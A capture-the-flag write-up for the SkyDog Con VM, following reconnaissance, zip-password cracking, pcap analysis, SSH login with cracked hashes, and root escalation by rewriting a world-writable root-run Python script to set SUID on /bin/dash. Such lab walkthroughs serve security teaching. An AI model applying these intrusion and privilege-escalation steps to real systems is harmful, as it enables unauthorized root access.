SkyDog Con CTF Writeup
- Service Discovery
- Port 80
- Landing Page
- robots.txt
- /Setec/
- /Setec/Astronomy/
- OSINT
- Company Traffic
- OSINT
- Little Black Box
- Another route
- Conclusion
After noticing a Tweet stating that the SkyDog Con CTF was now available for download, I decided to take a look.
This CTF apparently has six flags to find.
Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box
Let's get started!
Service Discovery
nmap -sT -T4 -A -v 192.168.57.101
Starting Nmap 6.49SVN ( https://nmap.org ) at 2015-11-03 08:22 GMT
NSE: Loaded 127 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Initiating ARP Ping Scan at 08:22
Scanning 192.168.57.101 [1 port]
Completed ARP Ping Scan at 08:22, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:22
Completed Parallel DNS resolution of 1 host. at 08:22, 0.01s elapsed
Initiating Connect Scan at 08:22
Scanning 192.168.57.101 [1000 ports]
Discovered open port 80/tcp on 192.168.57.101
Discovered open port 22/tcp on 192.168.57.101
Completed Connect Scan at 08:22, 2.46s elapsed (1000 total ports)
Initiating Service scan at 08:22
Scanning 2 services on 192.168.57.101
Completed Service scan at 08:22, 6.01s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.57.101
adjust_timeouts2: packet supposedly had rtt of -152001 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -152001 microseconds. Ignoring time.
NSE: Script scanning 192.168.57.101.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.38s elapsed
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Nmap scan report for 192.168.57.101
Host is up (0.0082s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|_ 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:EF:0B:15 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 198.839 days (since Sat Apr 18 13:14:16 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 8.22 ms 192.168.57.101
NSE: Script Post-scanning.
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Initiating NSE at 08:22
Completed NSE at 08:22, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
Raw packets sent: 33 (2.406KB) | Rcvd: 24 (1.638KB)
So, we've got an SSH server on port 22 and a web server on port 80.
I briefly check SSH, but there is nothing of interest at the moment (no banner).
Let's move on.
Port 80
Thanks to nmaps scripts, we can already see that there is a 'robots.txt' file.
/search
/sdch
/groups
/catalogs
/catalogues
/news
/nwshp
/setnewsprefs?
/index.html?
/?
/?hl=*&
/?hl=*&*&gws_rd=ssl
/addurl/image?
/mail/
/pagead/
Landing Page
All that's output on the page is a JPG.
I use exiftool to check for any interesting information.
exiftool SkyDogCon_CTF.jpg
ExifTool Version Number : 9.74
File Name : SkyDogCon_CTF.jpg
Directory : .
File Size : 83 kB
File Modification Date/Time : 2015:09:18 12:35:25+01:00
File Access Date/Time : 2015:11:03 08:34:12+00:00
File Inode Change Date/Time : 2015:11:03 08:34:12+00:00
File Permissions : rw-rw-r--
File Type : JPEG
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Exif Byte Order : Big-endian (Motorola, MM)
Software : Adobe ImageReady
XP Comment : flag{abc40a2d4e023b42bd1ff04891549ae2}
Padding : (Binary data 2060 bytes, use -b option to extract)
Image Width : 900
Image Height : 525
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 900x525
In the XP Comment field, we get our first flag. I'll try and match up the flags I find with the statements in the intro text.
Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
flag{abc40a2d4e023b42bd1ff04891549ae2}
Next, I start to check out the directories listed in the 'robots.txt' file.
robots.txt
For completeness, I manually fetch the 'robots.txt' file.
# Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}
#
User-agent:*
Disallow: /search
Allow: /search/about
Disallow: /sdch
Disallow: /groups
Disallow: /catalogs
Allow: /catalogs/about
Allow: /catalogs/p?
Disallow: /catalogues
Allow: /newsalerts
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow: /index.html?
Disallow: /?
Allow: /?hl=
Disallow: /?hl=*&
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Allow: /?pt1=true$
Disallow: /addurl/image?
Allow: /mail/help/
Disallow: /mail/
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /imgres
Disallow: /imglanding
Disallow: /sbd
Disallow: /keyword/
Disallow: /u/
Disallow: /univ/
Disallow: /cobrand
Disallow: /custom
Disallow: /advanced_group_search
Disallow: /googlesite
Disallow: /preferences
Disallow: /setprefs
Disallow: /swr
Disallow: /url
Disallow: /default
Disallow: /m?
Disallow: /m/
Allow: /m/finance
Disallow: /wml?
Disallow: /wml/?
Disallow: /wml/search?
Disallow: /xhtml?
Disallow: /xhtml/?
Disallow: /xhtml/search?
Disallow: /xml?
Disallow: /imode?
Disallow: /imode/?
Disallow: /imode/search?
Disallow: /jsky?
Disallow: /jsky/?
Disallow: /jsky/search?
Disallow: /pda?
Disallow: /pda/?
Disallow: /pda/search?
Disallow: /sprint_xhtml
Disallow: /sprint_wml
Disallow: /pqa
Disallow: /palm
Disallow: /gwt/
Disallow: /purchases
Disallow: /bsd?
Disallow: /linux?
Disallow: /mac?
Disallow: /microsoft?
Disallow: /unclesam?
Disallow: /answers/search?q=
Disallow: /local?
Disallow: /local_url
Disallow: /shihui?
Disallow: /shihui/
Disallow: /froogle?
Disallow: /products?
Disallow: /froogle_
Disallow: /product_
Disallow: /products_
Disallow: /products;
Disallow: /print
Disallow: /books/
Disallow: /bkshp?*q=*
Disallow: /books?*q=*
Disallow: /books?*output=*
Disallow: /books?*pg=*
Disallow: /books?*jtp=*
Disallow: /books?*jscmd=*
Disallow: /books?*buy=*
Disallow: /books?*zoom=*
Allow: /books?*q=related:*
Allow: /books?*q=editions:*
Allow: /books?*q=subject:*
Allow: /books/about
Allow: /booksrightsholders
Allow: /books?*zoom=1*
Allow: /books?*zoom=5*
Disallow: /ebooks/
Disallow: /ebooks?*q=*
Disallow: /ebooks?*output=*
Disallow: /ebooks?*pg=*
Disallow: /ebooks?*jscmd=*
Disallow: /ebooks?*buy=*
Disallow: /ebooks?*zoom=*
Allow: /ebooks?*q=related:*
Allow: /ebooks?*q=editions:*
Allow: /ebooks?*q=subject:*
Allow: /ebooks?*zoom=1*
Allow: /ebooks?*zoom=5*
Disallow: /patents?
Disallow: /patents/download/
Disallow: /patents/pdf/
Disallow: /patents/related/
Disallow: /scholar
Disallow: /citations?
Allow: /citations?user=
Disallow: /citations?*cstart=
Allow: /citations?view_op=new_profile
Allow: /citations?view_op=top_venues
Disallow: /complete
Disallow: /s?
Disallow: /sponsoredlinks
Disallow: /videosearch?
Disallow: /videopreview?
Disallow: /videoprograminfo?
Allow: /maps?*output=classic*
Allow: /maps/api/js?
Allow: /maps/d/
Disallow: /maps?
Disallow: /mapstt?
Disallow: /mapslt?
Disallow: /maps/stk/
Disallow: /maps/br?
Disallow: /mapabcpoi?
Disallow: /maphp?
Disallow: /mapprint?
Disallow: /maps/api/js/
Disallow: /maps/api/staticmap?
Disallow: /mld?
Disallow: /staticmap?
Disallow: /places/
Allow: /places/$
Allow: /Setec/
Disallow: /maps/preview
Disallow: /maps/place
Disallow: /help/maps/streetview/partners/welcome/
Disallow: /help/maps/indoormaps/partners/
Disallow: /lochp?
Disallow: /center
Disallow: /ie?
Disallow: /sms/demo?
Disallow: /katrina?
Disallow: /blogsearch?
Disallow: /blogsearch/
Disallow: /blogsearch_feeds
Disallow: /advanced_blog_search
Disallow: /uds/
Disallow: /chart?
Disallow: /transit?
Disallow: /mbd?
Disallow: /extern_js/
Disallow: /xjs/
Disallow: /calendar/feeds/
Disallow: /calendar/ical/
Disallow: /cl2/feeds/
Disallow: /cl2/ical/
Disallow: /coop/directory
Disallow: /coop/manage
Disallow: /trends?
Disallow: /trends/music?
Disallow: /trends/hottrends?
Disallow: /trends/viz?
Disallow: /trends/embed.js?
Disallow: /trends/fetchComponent?
Disallow: /notebook/search?
Disallow: /musica
Disallow: /musicad
Disallow: /musicas
Disallow: /musicl
Disallow: /musics
Disallow: /musicsearch
Disallow: /musicsp
Disallow: /musiclp
Disallow: /browsersync
Disallow: /call
Disallow: /archivesearch?
Disallow: /archivesearch/url
Disallow: /archivesearch/advanced_search
Disallow: /base/reportbadoffer
Disallow: /urchin_test/
Disallow: /movies?
Disallow: /codesearch?
Disallow: /codesearch/feeds/search?
Disallow: /wapsearch?
Disallow: /reviews/search?
Disallow: /orkut/albums
Allow: /jsapi
Disallow: /views?
Disallow: /c/
Disallow: /cbk
Allow: /cbk?output=tile&cb_client=maps_sv
Disallow: /recharge/dashboard/car
Disallow: /recharge/dashboard/static/
Disallow: /translate_a/
Disallow: /translate_c
Disallow: /translate_f
Disallow: /translate_static/
Disallow: /translate_suggestion
Disallow: /profiles/me
Allow: /profiles
Disallow: /s2/profiles/me
Allow: /s2/profiles
Allow: /s2/oz
Allow: /s2/photos
Allow: /s2/search/social
Allow: /s2/static
Disallow: /s2
Disallow: /transconsole/portal/
Disallow: /gcc/
Disallow: /aclk
Disallow: /cse?
Disallow: /cse/home
Disallow: /cse/panel
Disallow: /cse/manage
Disallow: /tbproxy/
Disallow: /imesync/
Disallow: /shenghuo/search?
Disallow: /support/forum/search?
Disallow: /reviews/polls/
Disallow: /hosted/images/
Disallow: /ppob/?
Disallow: /ppob?
Disallow: /adwordsresellers
Disallow: /accounts/ClientLogin
Disallow: /accounts/ClientAuth
Disallow: /accounts/o8
Allow: /accounts/o8/id
Disallow: /topicsearch?q=
Disallow: /xfx7/
Disallow: /squared/api
Disallow: /squared/search
Disallow: /squared/table
Disallow: /toolkit/
Allow: /toolkit/*.html
Disallow: /globalmarketfinder/
Allow: /globalmarketfinder/*.html
Disallow: /qnasearch?
Disallow: /app/updates
Disallow: /sidewiki/entry/
Disallow: /quality_form?
Disallow: /labs/popgadget/search
Disallow: /buzz/post
Disallow: /compressiontest/
Disallow: /analytics/reporting/
Disallow: /analytics/admin/
Disallow: /analytics/web/
Disallow: /analytics/feeds/
Disallow: /analytics/settings/
Allow: /alerts/manage
Allow: /alerts/remove
Disallow: /alerts/
Allow: /alerts/$
Disallow: /ads/search?
Disallow: /ads/plan/action_plan?
Disallow: /ads/plan/api/
Disallow: /ads/hotels/partners
Disallow: /phone/compare/?
Disallow: /travel/clk
Disallow: /hotelfinder/rpc
Disallow: /hotels/rpc
Disallow: /flights/rpc
Disallow: /commercesearch/services/
Disallow: /evaluation/
Disallow: /chrome/browser/mobile/tour
Disallow: /compare/*/apply*
Disallow: /forms/perks/
Disallow: /baraza/*/search
Disallow: /baraza/*/report
Disallow: /shopping/suppliers/search
Disallow: /ct/
Disallow: /edu/cs4hs/
Disallow: /trustedstores/s/
Disallow: /trustedstores/tm2
Disallow: /trustedstores/verify
Disallow: /adwords/proposal
Disallow: /shopping/product/
Disallow: /shopping/seller
Disallow: /shopping/reviewer
Disallow: /about/careers/apply/
Disallow: /about/careers/applications/
Disallow: /landing/signout.html
Disallow: /webmasters/sitemaps/ping?
Disallow: /ping?
Allow: /gb/images
Allow: /gb/js
Disallow: /gallery/
Looks like we've actually got a great many more entries in 'robots.txt' than nmap initially reported..and, we've got our second flag!
Flag #2 When do Androids Learn to Walk?
flag{cd4f10fcba234f0e8b2f60a490c306e6}
The content of the 'robots.txt' file looks like at least a partial copy of Googles one. This should be fun.
I write a quick Python script to parse the 'robots.txt' file, and test each URL defined therein.
import requests
lines = tuple(open('robots.txt', 'r'))
for line in lines:
if line[0] != '#' and line[0].strip() != '':
lineSplit = line.split(': ')
if lineSplit[0].lower() == 'allow' or lineSplit[0].lower() == 'disallow':
targetUrl = 'http://192.168.57.101%s' % lineSplit[1].strip()
r = requests.get(targetUrl)
if r.status_code != 404:
print targetUrl
And here's the output.
python extract-robots.py
http://192.168.57.101/index.html?
http://192.168.57.101/?
http://192.168.57.101/?hl=
http://192.168.57.101/?hl=*&
http://192.168.57.101/?hl=*&gws_rd=ssl$
http://192.168.57.101/?hl=*&*&gws_rd=ssl
http://192.168.57.101/?gws_rd=ssl$
http://192.168.57.101/?pt1=true$
http://192.168.57.101/Setec/
So, we've got a single real URL to check from 'robots.txt' - '/Setec'
/Setec/
Before opening the URL in the browser, I check out the source behind it with curl.
<html>
<img src="./Astronomy/Setec_Astronomy.jpg" width="1024" height="768" alt="" />
<!--
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker_Approved("NSA-Agent-Abbott"; AKA Darth Vader);
pageTracker._trackPageview();
} catch(err) {}</script>
-->
</html>
So we've got a JPG, and by the looks of it there is a hint in the commented out page tracker ("NSA-Agent-Abbott"; AKA Darth Vader).
I couldn't find anything of interest in the image.
/Setec/Astronomy/
I request the Astronomy directory, and am presented with a directory listing.
Index of /Setec/Astronomy
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory -
[IMG] Setec_Astronomy.jpg 2015-09-18 16:34 167K
[ ] Whistler.zip 2015-09-18 16:59 488
Cool - let's download the ZIP and take a look.
test@test-VirtualBox:~/skydog$ unzip -l Whistler.zip
Archive: Whistler.zip
Length Date Time Name
--------- ---------- ----- ----
38 2015-09-18 21:58 flag.txt
61 2015-09-18 21:29 QuesttoFindCosmo.txt
--------- -------
99 2 files
test@test-VirtualBox:~/skydog$ unzip Whistler.zip
Archive: Whistler.zip
[Whistler.zip] flag.txt password:
Damn - the ZIP file is encrypted.
Using 'fcrackzip', I test the ZIP against passwords from the 'rockyou' dump.
fcrackzip -D -v -u -p /opt/leaked_db-rockyou.txt Whistler.zip
found file 'flag.txt', (size cp/uc 50/ 38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc 72/ 61, flags 9, chk 83b5)
PASSWORD FOUND!!!!: pw == yourmother
Awesome - I unzip the archive, and cat out the contents of the two files.
test@test-VirtualBox:~/skydog$ unzip Whistler.zip
Archive: Whistler.zip
[Whistler.zip] flag.txt password:
extracting: flag.txt
inflating: QuesttoFindCosmo.txt
test@test-VirtualBox:~/skydog$ echo $(cat flag.txt)
flag{1871a3c1da602bf471d3d76cc60cdb9b}
test@test-VirtualBox:~/skydog$ echo $(cat QuesttoFindCosmo.txt)
Time to break out those binoculars and start doing some OSINT
So, we've got another flag.
Flag #3 Who Can You Trust?
flag{1871a3c1da602bf471d3d76cc60cdb9b}
OSINT
Next, we're told that we need to perform some OSINT. The only name I've got to go on so far is 'NSA Agent Abbott', from the source of the page '/Setec/'.
After a quick Google, we find a mention of an Agent Abbott on an IMDB listing for a film named 'Sneakers'.
Funnily enough, under the quotes for this character, there's a reference to another character named 'Whistler'.
Under the Wikipedia) article for the Film, there is also mention of a character named 'Cosmo'.
Another reference is from the source of the page '/Setec/'. The text states '"NSA-Agent-Abbott"; AKA Darth Vader'. This appears to be a reference to the actor James Earl Jones, who both voiced Darth Vader in the Star Wars franchise, and played the part of NSA Agent Bernard Abbott in Sneakers.
One last reference - which I didn't spot before - is in the image on the page '/Setec/'. The image has text that reads 'too many secrets'. This is an anagram for 'Setec Astronomy', as used in the film - you guessed it - Sneakers.
These are enough coincidences to convince me there is something we need to retrieve from the film script, related media, or more particularly the actor - James Earl Jones.
After digging, all I came up with was scripts and trivia. As the previous URL we had - '/Setec/' - was named from a term in the film, I dug through trivia and built up a word list, to run through dirbuster.
First of all, I copied all of the text from the IMDB Trivia article for the film into a file. I then ran a command to extract all the unique words from the file, and then used this list as a wordlist for dirbuster. this was my resulting word list.
A minute or so later, dirbuster threw up a few matches - awesome!
Directories found during testing:
Dirs found with a 200 response:
/
/PlayTronics/
Dirs found with a 403 response:
/icons/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/PlayTronics/flag.txt
/PlayTronics/companytraffic.pcap
Opening up '/PlayTronics/flag.txt', we are rewarded with our fourth flag. Not entirely sure on this reference..
Flag #4 Who Doesn’t Love a Good Cocktail Party?
flag{c07908a705c22922e6d416e0e1107d99}
Also in the directory, we have a pcap file.
Company Traffic
At first glance, the pcap file appears to contain a great deal of HTTPS traffic to Sound Cloud, along with DNS look ups for domains hosting associated assets. There are also the occasional requests using the STP (Spanning Tree Protocol).
Towards the end of the pcap is a HTTP request, to download an MP3 file.
GET /8Q3zbtBpxOHb.128.mp3?Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiKjovL2NmLW1lZGlhLnNuZGNkbi5jb20vOFEzemJ0QnB4T0hiLjEyOC5tcDMiLCJDb25kaXRpb24iOnsiRGF0ZUxlc3NUaGFuIjp7IkFXUzpFcG9jaFRpbWUiOjE0NDI1OTUwMDl9fX1dfQ__&Signature=YcIjOhLpPVrZXLO-WBktwm2ooBU4V1gQx8fazVm-cbyN8Y-NtqqOTeF9ENniPe5YOHqVMn8gWmGz~LeiAu1X4hvZkjiVZBCtSMPg6P9K54iZY2xQXwkmLM8BkgYaVkVB56Dt4F2UWbBNtZmXO5wM9qIp8Aazdbq0oIUWzGZ4GA37Rcb7ib0dIL-zXoDc~Qz2L9k4Mq-mixGesFRCbhEkW-JVkXnLxO-u3bIXVzHT7U9yprPQEGfykvzEXiXcU83u7fTo-jQOJeecfGfgdCJC3sCzExuZ8Lexz0nGvnl2-MlqWacDmad6e46g0tlEiu-l2JVnWKNd853mRFxON0Kgng__&Key-Pair-Id=APKAJAGZ7VMH2PFPW6UQ HTTP/1.1
Host: cf-media.sndcdn.com
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
This was sent to the IP 54.239.172.25, from the IP 192.168.2.223.
I follow the TCP stream, and then save the response contents to file. I then open it up in the 'bless' hex editor, and remove everything after the response headers, which results in the complete mp3 file.
After listening to the MP3 numerous times, I can make out the words 'my name is', 'passport' and 'verify'. I can't make out the name though. After a little Googling, another Sneakers reference came up, and I managed to link it to a YouTube Video. The full text for the snippet is as follows.
Hi. My Name Is Werner Brandes. My Voice Is My Passport. Verify Me.
Great, so that's where the sound bite came from, and that's the full content - what use is it to me?
I've tried logging in to SSH with variations of the name 'Werner Brandes', with word lists generated from my previous findings, but so far have come up blank.
OSINT
I'm going to admit - I got stuck here. I was pretty sure I had to login to SSH using some variation of the name 'Werner Brandes', but the password evaded me. After speaking to the author, a bomb was dropped that there was a reason MD5 hashes were used instead of SHA1.
Immediately, I entered my gathered flag hashes into Crackstation.
abc40a2d4e023b42bd1ff04891549ae2
Welcome Home
cd4f10fcba234f0e8b2f60a490c306e6
Bots
1871a3c1da602bf471d3d76cc60cdb9b
yourmother
c07908a705c22922e6d416e0e1107d99
leroybrown
Leroy Brown? Where did he come from?
After some experimentation, I hit upon pay dirt - username: wernerbrandes, password: leroybrown.
ssh wernerbrandes@192.168.57.101
wernerbrandes@192.168.57.101's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Tue Nov 3 10:23:30 EST 2015
System load: 0.0 Memory usage: 2% Processes: 79
Usage of /: 10.5% of 17.34GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
30 packages can be updated.
21 updates are security updates.
Last login: Fri Oct 30 19:08:28 2015 from 10.0.2.5
wernerbrandes@skydogctf:~$ ls -alh
total 32K
drwxr-xr-x 3 wernerbrandes wernerbrandes 4.0K Oct 30 19:09 .
drwxr-xr-x 4 root root 4.0K Sep 18 15:58 ..
-rw------- 1 wernerbrandes wernerbrandes 0 Oct 30 19:09 .bash_history
-rw-r--r-- 1 wernerbrandes wernerbrandes 220 Sep 18 15:58 .bash_logout
-rw-r--r-- 1 wernerbrandes wernerbrandes 3.6K Sep 18 15:58 .bashrc
drwx------ 2 wernerbrandes wernerbrandes 4.0K Sep 18 16:13 .cache
-rw-r--r-- 1 nemo nemo 38 Sep 18 17:39 flag.txt
-rw-r--r-- 1 wernerbrandes wernerbrandes 675 Sep 18 15:58 .profile
-rw-rw-r-- 1 wernerbrandes wernerbrandes 66 Oct 25 11:17 .selected_editor
wernerbrandes@skydogctf:~$ echo $(cat flag.txt)
flag{82ce8d8f5745ff6849fa7af1473c9b35}
There's our fifth flag!
Flag #5 Another Day at the Office
flag{82ce8d8f5745ff6849fa7af1473c9b35}
Funnily enough, this MD5 hash is not found on Crackstation. We've got one more flag to get.
Little Black Box
Another reference to Sneakers.
Let's have a sniff around the file system.
wernerbrandes@skydogctf:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
nemo:x:1000:1000:nemo,,,:/home/nemo:/bin/bash
wernerbrandes:x:1001:1001:Werner Brandes,,,:/home/wernerbrandes:/bin/bash
There's only one other non-system user available to us - nemo.
wernerbrandes@skydogctf:~$ groups nemo
nemo : nemo adm cdrom sudo dip plugdev lpadmin sambashare
The 'nemo' user is part of the sudo group.
After a while of attempting to get access to the nemo user, by using passwords previously used in this challenge, lists of common passwords and various other word lists, I come up empty.
Another route
In desperation, I decide to search for world writable files.
wernerbrandes@skydogctf:~$ find / -perm -0002 -type f 2>/dev/null | grep -v "/proc/"
/lib/log/sanitizer.py
/sys/kernel/security/apparmor/.access
wernerbrandes@skydogctf:~$ ls -alh /lib/log/sanitizer.py
-rwxrwxrwx 1 root root 127 Nov 3 14:06 /lib/log/sanitizer.py
Interesting - this doesn't look like a script that exists in any Ubuntu distribution I've worked with. Let's see what it does.
wernerbrandes@skydogctf:~$ cat /lib/log/sanitizer.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
Ok - so looks like it's clearing out the '/tmp/' directory. I'm guessing this is run at a specific interval, to ensure the '/tmp/' directory does not get filled up with junk.
It's owned by 'root', so I hope that it gets run by root.
I update the script to set the SUID bit on the '/bin/dash' binary, and wait for a while.
#!/usr/bin/env python
import os
import sys
try:
os.system('chmod u+s /bin/dash')
except:
sys.exit()
Some time later, I check the '/bin/dash' binary.
wernerbrandes@skydogctf:~$ ls -alh /bin/dash
-rwsr-xr-x 1 root root 119K Feb 19 2014 /bin/dash
Awesome! Now, we should be able to get a dash session as root, simply by executing '/bin/dash'.
wernerbrandes@skydogctf:~$ /bin/dash
# id
uid=1001(wernerbrandes) gid=1001(wernerbrandes) euid=0(root) groups=0(root),1001(wernerbrandes)
Great success.
Time to find our last flag.
cd /root
# ls -alh
total 36K
drwx------ 3 root root 4.0K Oct 30 19:09 .
drwxr-xr-x 22 root root 4.0K Sep 14 17:26 ..
-rw------- 1 root root 326 Oct 30 19:10 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 19 2014 .bashrc
drwxr-xr-x 2 root root 4.0K Sep 18 17:51 BlackBox
-rw------- 1 root root 12 Oct 30 19:04 .nano_history
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw-r--r-- 1 root root 66 Oct 25 11:17 .selected_editor
-rw------- 1 root root 1.7K Oct 30 19:09 .viminfo
# cd BlackBox
# ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Sep 18 17:51 .
drwx------ 3 root root 4.0K Oct 30 19:09 ..
-rw-r--r-- 1 nemo nemo 155 Sep 18 17:50 flag.txt
# echo $(cat flag.txt)
flag{b70b205c96270be6ced772112e7dd03f}
Congratulations!! Martin Bishop is a free man once again! Go here to receive your reward.
/CongratulationsYouDidIt
And there it is.
Flag #6 Little Black Box
flag{b70b205c96270be6ced772112e7dd03f}
If we browse to '/CongratulationsYouDidIt', we're shown a scene from Karate Kid. Such feels!
Conclusion
This was a nice little VM - the OSINT steps were a nice addition, and the hiding of content within the flags (by means of the MD5 hash) was cool.
I'm pretty bummed out that I had to get a hint from the author in order to solve it, but enjoyed it none the less.